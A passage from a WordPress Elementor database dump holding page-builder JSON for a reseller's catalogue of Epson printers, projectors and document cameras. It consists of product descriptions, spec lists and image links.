PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7769,3453,'_elementor_version','2.5.14'),(7772,3454,'_wp_page_template','template-fullwidth.php'),(7773,3454,'_elementor_edit_mode','builder'),(7774,3454,'_elementor_template_type','post'),(7775,3454,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring 